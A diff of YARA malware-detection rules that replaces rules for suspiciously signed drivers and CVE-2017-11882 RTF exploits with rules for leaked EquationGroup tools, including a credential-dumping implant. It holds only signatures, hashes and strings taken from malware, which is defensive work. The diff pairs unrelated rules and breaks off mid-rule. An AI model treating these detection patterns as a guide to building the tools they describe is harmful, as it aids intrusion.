 		author = "Florian Roth (Nextron Systems)"
-		id = "0e312237-0c82-59da-b62d-56065c6075f0"
-		date = "2019-09-26"
+		id = "ec0e90a5-1359-55e5-9165-494f90431247"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sign_anomalies.yar#L4-L25"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2787-L2807"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "27d8d8d19e25a2e3cffb765a0b3122e38dcb72d60c00c554163ee193a04b3d82"
-		score = 65
+		logic_hash = "04cdd8e4ca9df0231ca66caa8083eff1fe0834cdedc4360fce0a934970a6d162"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5294a730f1f0a176583b9ca2b988b3f5ec65dad8c6ebe556b5135566f2c16a56"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1bcd04b41c6b574a5c9367b777efc8b95fe6cc4e526978b7e8e09214337fac1"
 
 	strings:
-		$sc1 = { 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63
-               00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00
-               00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-               00 66 00 74 00 20 00 4F 00 66 00 66 00 69 00 63
-               00 65 00 20 00 53 00 6F 00 66 00 74 00 77 00 61
-               00 72 00 65 00 20 00 50 00 72 00 6F 00 74 00 65
-               00 63 00 74 00 69 00 6F 00 6E 00 20 00 50 00 6C
-               00 61 00 74 00 66 00 6F 00 72 00 6D 00 20 00 53
-               00 65 00 72 00 76 00 69 00 63 00 65 }
+		$x1 = "~debl00l.tmp" fullword ascii
+		$x2 = "\\\\.\\mailslot\\c54321" fullword ascii
+		$x3 = "\\\\.\\mailslot\\c12345" fullword ascii
+		$x4 = "nowMutex" fullword ascii
+		$s1 = "System\\CurrentControlSet\\Services\\MSExchangeIS\\ParametersPrivate" fullword ascii
+		$s2 = "000000005017C31B7C7BCF97EC86019F5026BE85FD1FB192F6F4237B78DB12E7DFFB07748BFF6432B3870681D54BEF44077487044681FB94D17ED04217145B98" ascii
+		$s3 = "00000000E2C9ADBD8F470C7320D28000353813757F58860E90207F8874D2EB49851D3D3115A210DA6475CCFC111DCC05E4910E50071975F61972DCE345E89D88" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and $sc1 and pe.number_of_signatures < 1
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or 2 of ( $s* ) ) )
 }
-rule SIGNATURE_BASE_SUSP_PE_Signed_By_Suspicious_Entitiy_Mar23 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Xxxridearea : FILE
 {
 	meta:
-		description = "Find driver signed by suspicious company (see references)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13151f9b-22cb-551f-81b4-a60a301f0bfc"
-		date = "2023-03-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2475778b-1246-5471-b305-a946c253c50c"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_sign_anomalies.yar#L28-L214"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2809-L2825"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b"
-		hash = "9a24befcc0c0926abb49d43174fe25c2469cca06d6ab3b5000d7c9d434c42fe9"
-		hash = "9ad716f0173489e74fefe086000dfbea9dc093b1c3460bed9cdb82f923073806"
-		hash = "a007c8c6c1aecfff1065429fef691e7ae1c0ce20012a113f01ac57c61564a627"
-		hash = "fbe82a21939d04735aa3bbf23fbabd45ac491a143396e8e62ee20509c1257918"
-		hash = "d12c6ea0a86c58ea2d80d1dc9b793ba28a0db92c72bb5b6f4ee2b800fe42091b"
-		hash = "4cf31d000f1542690cbc0ace41e4166651a71747978dc408e3cce32e82713917"
-		hash = "e1adaea335b20d4d2e351f7bea496cd40cb379376900434866db342f851d9ddf"
-		hash = "031408cf2f2c282bcc05066356fcc2bb862b7e3c504ab7ffb0220bea341404a5"
-		hash = "2f13d4e1bd35f6c0ad0978af19006c17193cf3d42b71cba763cca68f7e9d7fca"
-		hash = "cb40a5dc4f6a27b1dc50176770026b827f8baa05fa95a98a4e880652f6729d96"
-		hash = "a7591b7384bd10eb934f0dac8dcbfdff8c352eba2309f4d75553567fa2376efa"
-		hash = "d517ce5f132b3274f0b9783a5b0c37d1d648e6079874960af24ca764b011c042"
-		hash = "aeec903013d5b66f0ae1c6fa50bb892759149c1cec86db8089a4e60482e02250"
-		hash = "0d22828724cb7fbc6cef7f98665d020867d2eb801cff2c21f2e97e481040499b"
-		hash = "4b2e874d51d332fd840dadd463a393f9f019de46e49de73be910b9b1365e4e4e"
-		hash = "3839c0925acf836238ba9a0c5798b84b1c089a8353cc27ae7e6b75d273b539e3"
-		hash = "c470f519fb0d4a2862035e0d9e105a0a6918adc51842b12ad14b5b5f34879963"
-		hash = "cc6d174bc86f84f5a4c516e9c04947e2fecc0509a84748ea80576aeee5950aed"
-		hash = "6fe8df70254f9b5f53452815f0163cb2ffb2d7f0f5aefbb9b149ad1be9284e31"
-		hash = "4cde473fb68fa9b2709ea8a23349cd2fce8b8b3991b9fea12f95d12292b8aa7a"
-		hash = "e2c40c8dd60bb395807c39c76bfdf5cd158ebefd2a47ad3306a96662c50057c0"
-		hash = "9c12b09b529fa517eaeb49df22527d7563b5432d62776166048d97f83b2dce5c"
-		hash = "5a4e17287f3dceb5bf1ed411e5fdd7e8692aebf2a19b334327733fc1c158b0ba"
-		hash = "c42964aa7fa354b1a285bdbcbd9e84b6bdd8813ff9361955e0e455d032803cce"
-		hash = "ffd6955bf40957a35901d82fd5b96d0cb191b651d3eca7afa779eebfed0d9f7e"
-		hash = "f6874335eb0d611d47b2ec99a6b70f7b373a50d8d1f62d290b06174f42279f36"
-		hash = "4e6d7fd70a143f19429fead2c14779aea9d9140e270bb9e91e47fa601643e40e"
-		hash = "7b0e4aae37660b1099de69f4c14f5d976f260c64a4af8495ff1415512a6268ba"
-		hash = "db45cbfb094f3e1ebf1cb3880087a24d4e771cc43ba48ad373e6283cbe7391da"
-		hash = "813edc804f59a97ec9391ea0db4b779443bd8daf1e64c622b5e3c9a22ee9c2e0"
-		hash = "8d66a4b7c2ae468390d32e5e70b3f9b7cb796b54b7c404cde038de9786be8d1d"
-		hash = "85936141f0f32cf8f3173655e7200236d1fce6ef9c2616fd2b19ae7951c644c5"
-		hash = "b5fc0cc9980fc594a18682d2b0d5b0d0f19ba7a35d35106693a78f4aaba346ac"
-		hash = "7aae36c5ffa8baaab19724dae051673ddafd36107cb61c505926bfceaadcd516"
-		hash = "5d0228a0d321e2ddac5502da04ca7a2b2744f3dc1382daa5f02faa9da5aface1"
-		hash = "2af1ac8bc8ae8d7cad703d2695f2f6c6d79b82eebba01253a8ec527e11e83fcd"
-		hash = "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497"
-		hash = "0e339c9c8a6702b32ee9f2915512cbeb3391ced74b16c7e0aed9b1a80c9e58c8"
-		hash = "80bdeaa4f162c65722b700e4ffba31701d0d634f5533e59bf3885dc67ee92f3f"
-		hash = "4570f64f2000bdaf53aec0fc2214c8bd54e0f5cb75987cdf1f8bda6ea5fc4c43"
-		hash = "a9c906bde6c8a693d5d46c9922dafa2dfd2dec0fff554f3f6a953c2e36d3f7b7"
-		hash = "520df3ddd7c9ecdeecac8e443d75ac258c26b45d37ecec22501afdda797f6a0a"
-		hash = "4d3e0f27a7bcfd4b442b489c63641af22285ca41c6d56ac1db734196ab10b315"
-		hash = "5000b3b1d593ba40cc10098644af1551259590ac67d3726fab2be87aad460877"
-		hash = "7c27bd6104fc67dd16e655f3bf67c2abd8b5bf2a693ba714ac86904c5765b316"
-		hash = "34b1234eab7ff10edde9e09ecf73c5e4bfe9ee047ccfdb43de1e1f6155afad0c"
-		hash = "f6fe2cc9ea31f85273c26e84422137df21cfce4b9e972b0db94fe3a67b54f6ca"
-		hash = "ec4d0828196926bd36325f4b021895d37cfaaa024f754b36618c78b2574f0122"
-		hash = "2a89f263d85da8fb0c934d287b5b524744479741491c740aaa46ac9f694f6d1b"
-		hash = "c8d0122974fc10a7d82c62f3e6573a94379c026dd741fd73497afdf36d3929be"
-		hash = "0345f71876bc4c888deadba7284565a8da112901f343e54b8522279968abd1b2"
-		hash = "6c0e10650be9e795dc6adfbe8aad8c1c3a8657e4c45cb82a7d5188ee24021ca0"
-		hash = "90b8d9c4ff3e4e0a0342e0d91da3a25be2fead29f3b32888bb35f8575845259d"
-		hash = "0310400c9e62c3fe08dc6506313e26f7c5c89035c81b0141ce57543910c1c42e"
-		hash = "b0da0316443f878aad0b3d9764b631d5df60e119ab59324c37640da1b431893a"
-		hash = "cc4bd06f27a5f266bc8825a08e5f45dcaa4352eb6d69214b5037d28cc8de6908"
-		hash = "2d4b7c6931203923db9a07e1ac92124e799f3747ab20e95e191e99c7b98f3fbd"
-		hash = "b5965de0d883fd0602037f3dc26fd4461e6328612f1a34798cff0066142e13c4"
-		hash = "86ce17183ddf32379db53ecaedefe0811252165b05cd326025bb8eca2e6a25d7"
-		hash = "6edca16d5aa751aa4c212e6477121d51e4d9b9432896d25b41938a27a554bbe7"
-		hash = "cdd8966e0cf08a6578e34de7498a44413a6adabae04d81ef3129f26305966db2"
-		hash = "df890974589ed2435f53b8c8f147a06752f1b37404afd4431362c1938fcb451e"
-		hash = "3e05d8abaaa95af359e5b09efb30546d0aa693859ebc8a0970a2641556ea644c"
-		hash = "1c8ddf4b9c99c8f1945abf1527c7fa93141430680ac156a405d9a927d32f3b5e"
-		hash = "5d2ed5930ab1a650f9fb9293f49a9f35737139fdfa9f14e46a07e5d4d721ae3e"
-		hash = "18834de3e4844a418970c2184cc78c2d7cb61d18e9f7c7c0e88e994b4212edc5"
-		hash = "a6b6fc94d8e582059af0fe30c2c93c687fccd5a0073a6a26a2cd097ea96adc7c"
-		hash = "28b40fa160c915f13f046d36725c055d6c827a4d28674ea33c75a9b410321290"
-		hash = "efab0fbf77dc67a792efd1fe2b3f46bbdfdee30a9321acc189c53a6c5e90f05c"
-		hash = "348781221d1a2886923de089d1b7b12c32cfdd38628b71203da925b5736561e9"
-		hash = "a1a5f410e6eab2445d64bfcd742fe1a802a0a2d9af45c7ab398f84894dd5dc3d"
-		hash = "9de05ce0d9e9de05ebdc2859a5156f044f98bb180723f427a779d36b1913e5d3"
-		hash = "eeff7e85c50a7f11fc8a99f7048953719fb1d2a6451161a0796eac43119ece21"
-		hash = "383cc025800a3b3d089f7697e78fe4d5695a8d1ee26dcad0b0956ad6800ccae4"
-		hash = "41be6f393cea4d8d5869fff526c4d75ec66c855f7e9c176042c39b9682ea9c14"
-		hash = "71552e65433c8bbf14e5bcbc35a708bc10d6fded740c5f4783edce84aea4aabf"
-		hash = "3c1b3e8666b58a78c70f36ed557c7ecc52e84457e87e5884b42e5cd9e8c1a303"
-		hash = "4288d7113031151a2636a164c0dc6fce78c86f322271afec9ef2d4b54494c334"
-		hash = "f73a39332be393a9bc23ec27ff6d025bc90d7320dde97f37cc585ecf6c0436a2"
-		hash = "018f5103635992aa9ddc1c46cafe2b7ba659fcfbc8f8ab29dcea28e155b033ee"
-		hash = "fe650fc138dcfbbd4ab6aa5718bf3cd36f50898ae19d3aceaa12f7d4f39d0b43"
-		hash = "fa21b39cd5a24ba35433e90cae486454b7400b50e7f7f5c190fdbec6704b4352"
-		hash = "3dd36c798cc89bfad7cdbf58d7da90ba113fe043ca46bdbcab7ae7fb9dc2f42b"
-		hash = "674f4444f0de5c81c766c376a65fbdf1f7116228a61c71ffb504995c9e160183"
-		hash = "cd3d25b2842bb2d6a5580f72e819acd344ce7f3a2478fb6d53ff668ad6531228"
-		hash = "1668f4eb8a85914db46ff308b9f8a5040a024acc93259dfc004ea2b80ab6bcf1"
-		hash = "4f31cab6c011b79bf862bb6acea3086308b0576afe33affdb09039c97e723beb"
-		hash = "6b0ff48b8113076d2875edb7bea7f120b7b9d9a990ae296a5b5a95660ae7edfc"
-		hash = "956a00dd6382e83d3f7490378ae98e4fc8d9b8ec2cd549519f007091e3ccce1f"
-		hash = "8c7f938cf55728d8d41a7fa6b9953c4f81cf05ed3d7b7435ec8999e130257f7f"
-		hash = "427ee4d4d18fc0c1196326215e94947f7d8c03794de36d0127231690bf5bf3c0"
-		hash = "b6f3ece5bf7b9f6ecf99104d3c76b9007106fad98d20500956dd1e42d4ec5e8d"
-		hash = "47a0ad6150c5a1de4c788827662a9cafbd2816a7d32be2028721e49a464acbed"
-		hash = "8743ac81384fd10c0459f3574489d626e13c95dd73274dcf1d872bcd3630b9e8"
-		hash = "a1755415a12f85bea3f65807860f902cf41e56b0ab2c155ac742af3166ef1dfd"
-		hash = "3f5a91500bfade2d9708e1fbe76ae81dacdb7b0f65f335fee598546ccfc267e3"
-		hash = "5be43b773dbde6542d6a0d53cd6616ea95a49dd38659edc6ba0d580a0d9777ab"
-		hash = "90e080a63916c768b0b65787fe5695fd903d44e1b0b688d06c14988ba30b5ea7"
-		hash = "d1184ee3f26919b8f5a4b1a6d089f14e79e0c89260590156111f72a979c8e446"
-		hash = "c13ddd2bafcfdfc00fb5cb87d8eb533ae094b0dd5784df77c98bddeac9d72725"
-		hash = "9bb3035610bd09ba769c0335f23f98dd85c2f32351cdd907d4761b41ab5d099c"
-		hash = "1703025c4aed71d0ca29a3cd0e15047c24cc9adbb5239765f63e205ef7d65753"
-		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
-		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
-		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
-		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
-		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
-		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
-		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
-		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
-		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
-		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
-		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
-		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
-		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
-		hash = "5654ed1205de6860e66383a27231e4ac2bb7639b07504121d313a8503ece3305"
-		hash = "5d1e3c495d08982459b4bd4fd2ab073ed2078fce9347627718a7c25adee152e9"
-		hash = "458702ae1b2ef8a113344be76af185ee137b7aac3646ece626d2eeeadcc9e003"
-		hash = "2c703e562a6266175379fa48f06f58aab109dbe56e0cde24b4b0db5f22f810a3"
-		hash = "49faf70c0978c21a68bc8395cf326f50c491e379f55b5df7d17f0af953861ece"
-		hash = "a2b16bbef0a7cb545597828466cd13225efaba6e7006bfbf59040bbff54c463c"
-		hash = "b08449d42f140c7e4d070c5f81ce7509f48282a5bb0e06948b7ed65053696a37"
-		hash = "c1633ad8c9e6c2b4cc23578655fc6cf5cd0122cfd24395d1551af1d092f89db2"
-		hash = "01f42f949a37d9d479b8021f27dcf0d0e6f0b0b6cd2e0883c6b4b494f0a1d32a"
-		hash = "4943d53a38ac123ed7c04ad44742a67ea06bb54ea02fa241d9c4ebadab4cb99a"
-		hash = "597ce12c9fbecc71299ba6fc3e4df36cc49222878d0e080c4c35bbfdffd30083"
-		hash = "0265fbd9cfc27c26c42374fce7cf0ef11f38e086308d51648b45f040d767c51d"
-		hash = "0dc92a1a6fd27144b3e35a9900038653892d25c2db8ede8b9e0aee04839f165a"
-		hash = "682582c324cb1eafacf80090f6108c1580fee12dbfdfe8b51771d429fdcce718"
-		hash = "e9e6f6e22b5924f80164fbad45be28299e9ec0bd2f404551b6ca772509a7135a"
-		hash = "a8db750f82906fb9cf9fb371ec65be76275d9b81b95e351fcb3db4ef345884ab"
-		hash = "e900b4016177259d07011139a55c0571c1e824fb7e9dddc11df493b3c8209173"
-		hash = "f8a7a26d51a5e938325deee86cbf5aa8263d3a50818c15d5a395b98658630c18"
-		hash = "861b87fc6c4758cfe1e26c7a038cffb64054ad633b7ea81319c9a98b7b49df0d"
-		hash = "848fdb491307ed7b002dbdf99796df2b286d53b2e0066d78f3554f2f38a2c438"
-		hash = "4b0c05bc33c9e7d0ed2d97dbefb6292469b9d74d650d5cfb2691345a11c0f54a"
-		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
-		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
-		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
-		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
-		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
-		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
-		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
-		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
-		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
-		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
-		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
-		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
-		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
-		logic_hash = "68c3f2c97a8eab3d334222eae4c4b808e6b763896f198d033f4d11218e9ff551"
-		score = 60
+		logic_hash = "4d2eeabbb3bb27f46232fe0a43f0ecda9f3589dbe6b08fd4f8aac14f6d12090b"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "214b0de83b04afdd6ad05567825b69663121eda9e804daff9f2da5554ade77c6"
 
 	strings:
-		$cert1 = "91210242MA0YGH36" wide ascii
-		$cert2 = "Copyright (C) 2013-2021 QuickZip. All rights reserved." wide ascii
-		$cert3 = "Qi Lijun" wide ascii
-		$cert4 = {51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
-		$cert5 = "Luck Bigger Technology Co., Ltd" wide ascii
-		$cert6 = {4c 00 75 00 63 00 6b 00 20 00 42 00 69 00 67 00 67 00 65 00 72 00 20 00 54 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 79 00 20 00 43 00 6f 00 2e 00 2c 00 20 00 4c 00 74 00 64 }
-		$cert7 = "XinSing Network Service Co., Ltd" wide ascii
-		$cert8 = "Hangzhou Shunwang Technology Co.,Ltd" wide ascii
-		$cert9 = "Zhuhai liancheng Technology Co., Ltd." wide ascii
-		$cert10 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert11 = { e5 8c 97 e4 ba ac e5 bc 98 e9 81 93 e9 95 bf e5 85 b4 e5 9b bd e9 99 85 e8 b4 b8 e6 98 93 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert12 = { e7 a6 8f e5 bb ba e5 a5 a5 e5 88 9b e4 ba 92 e5 a8 b1 e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert13 = { e5 8e a6 e9 97 a8 e6 81 92 e4 bf a1 e5 8d 93 e8 b6 8a e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 0a }
-		$cert14 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$x1 = "USAGE: %s -i InputFile -o OutputFile [-f FunctionOrdinal] [-a FunctionArgument] [-t ThreadOption]" fullword ascii
+		$x2 = "The output payload \"%s\" has a size of %d-bytes." fullword ascii
+		$x3 = "ERROR: fwrite(%s) failed on ucPayload" fullword ascii
+		$x4 = "Load and execute implant within the existing thread" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and any of ( $cert* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Rtf_Cve2017_11882_Ole : MALICIOUS EXPLOIT CVE_2017_11882
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak_Min_Install : FILE
 {
 	meta:
-		description = "Attempts to identify the exploit CVE 2017 11882"
-		author = "John Davison"
-		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc648deb-4220-5ec3-b95f-ff6cc463f79b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L1-L17"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2827-L2842"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
-		logic_hash = "6856d3c78cc06899d2bc1f876dce6b718513ebad80f37d7b5914a14d1da5064c"
-		score = 60
+		logic_hash = "f224c87c5626fee98dae5b4bbab2b4468bdd126ac63371ede53545d7cb177123"
+		score = 75
 		quality = 85
-		tags = "MALICIOUS, EXPLOIT, CVE_2017_11882"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f67214083d60f90ffd16b89a0ce921c98185b2032874174691b720514b1fe99e"
 
 	strings:
-		$headers = { 1c 00 00 00 02 00 ?? ?? a9 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 01 01 03 ?? }
-		$font = { 0a 01 08 5a 5a }
-		$winexec = { 12 0c 43 00 }
+		$s1 = "driver start" fullword ascii
+		$s2 = "DeviceIoControl Error: %d" fullword ascii
+		$s3 = "Phlook" fullword ascii
 
 	condition:
-		all of them and @font > @headers and @winexec == @font + 5 + 44
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Rtf_Cve2017_11882 : MALICIOUS EXPLOIT CVE_2017_1182
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setouraddr : FILE
 {
 	meta:
-		description = "Attempts to identify the exploit CVE 2017 11882"
-		author = "John Davison"
-		id = "b6c59cf1-52e4-5c9e-b3c3-d973d52736e3"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a2dbfa7b-3fb6-56cf-9391-1a3abb08e3cb"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L20-L39"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2844-L2858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "51cf2a6c0c1a29abca9fd13cb22421da"
-		logic_hash = "37a65f086d393aae3dc88b3dd2520fff6e96b92fd6ae1be0a110f4eb826ae12d"
-		score = 60
-		quality = 81
-		tags = "MALICIOUS, EXPLOIT, CVE_2017_1182"
+		logic_hash = "d49bcef48afeb63b763c88443930f28be1d6f9f27d5f0bd9161d151fa3081868"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "04ccc060d401ddba674371e66e0288ebdbfa7df74b925c5c202109f23fb78504"
 
 	strings:
-		$headers = { 31 63 30 30 30 30 30 30  30 32 30 30 ?? ?? ?? ??
-                     61 39 30 30 30 30 30 30  ?? ?? ?? ?? ?? ?? ?? ??
-                     ?? ?? ?? ?? ?? ?? ?? ??  ?? ?? ?? ?? ?? ?? ?? ??
-                     ?? ?? ?? ?? ?? ?? ?? ??  30 33 30 31 30 31 30 33
-                     ?? ?? }
-		$font = { 30 61 30 31 30 38 35 61  35 61 }
-		$winexec = { 31 32 30 63 34 33 30 30 }
+		$s1 = "USAGE: SetOurAddr <input file> <output file> <protocol> [IP/IPX address]" fullword ascii
+		$s2 = "Replaced default IP address (127.0.0.1) with Local IP Address %d.%d.%d.%d" fullword ascii
 
 	condition:
-		all of them and @font > @headers and @winexec == @font + ( ( 5 + 44 ) * 2 )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_Packager_Cve2017_11882 : CVE_2017_11882 FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Getadmin_LSADUMP_Modifyprivilege_Implant : FILE
 {
 	meta:
-		description = "Attempts to exploit CVE-2017-11882 using Packager"
-		author = "Rich Warren"
-		id = "57ff395e-e56a-5e63-bde6-f3cef038fcd6"
-		date = "2023-12-05"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b3fda153-563c-5a5c-9f5c-12d6ef8b3d95"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://github.com/rxwx/CVE-2017-11882/blob/master/packager_exec_CVE-2017-11882.py"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2017_11882.yar#L41-L56"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2860-L2882"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "94e0c70e8140bb7fa3d184447617b534a8b9a24cdad535e6818be9662f0b9144"
-		score = 60
-		quality = 54
-		tags = "CVE-2017-11882, FILE"
+		logic_hash = "ee5c818c29ccb1b280669f7f5e828963c4523b73b68674d8c0aae72189f0208c"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c8b354793ad5a16744cf1d4efdc5fe48d5a0cf0657974eb7145e0088fcf609ff"
+		hash2 = "5f06ec411f127f23add9f897dc165eaa68cbe8bb99da8f00a4a360f108bb8741"
 
 	strings:
-		$font = { 30 61 30 31 30 38 35 61  35 61 }
-		$equation = { 45 71 75 61 74 69 6F 6E 2E 33 }
-		$package = { 50 61 63 6b 61 67 65 }
-		$header_and_shellcode = /03010[0,1][0-9a-fA-F]{108}00/ ascii nocase
+		$s1 = "\\system32\\win32k.sys" wide
+		$s2 = "hKeAddSystemServiceTable" fullword ascii
+		$s3 = "hPsDereferencePrimaryToken" fullword ascii
+		$s4 = "CcnFormSyncExFBC" fullword wide
+		$s5 = "hPsDereferencePrimaryToken" fullword ascii
+		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
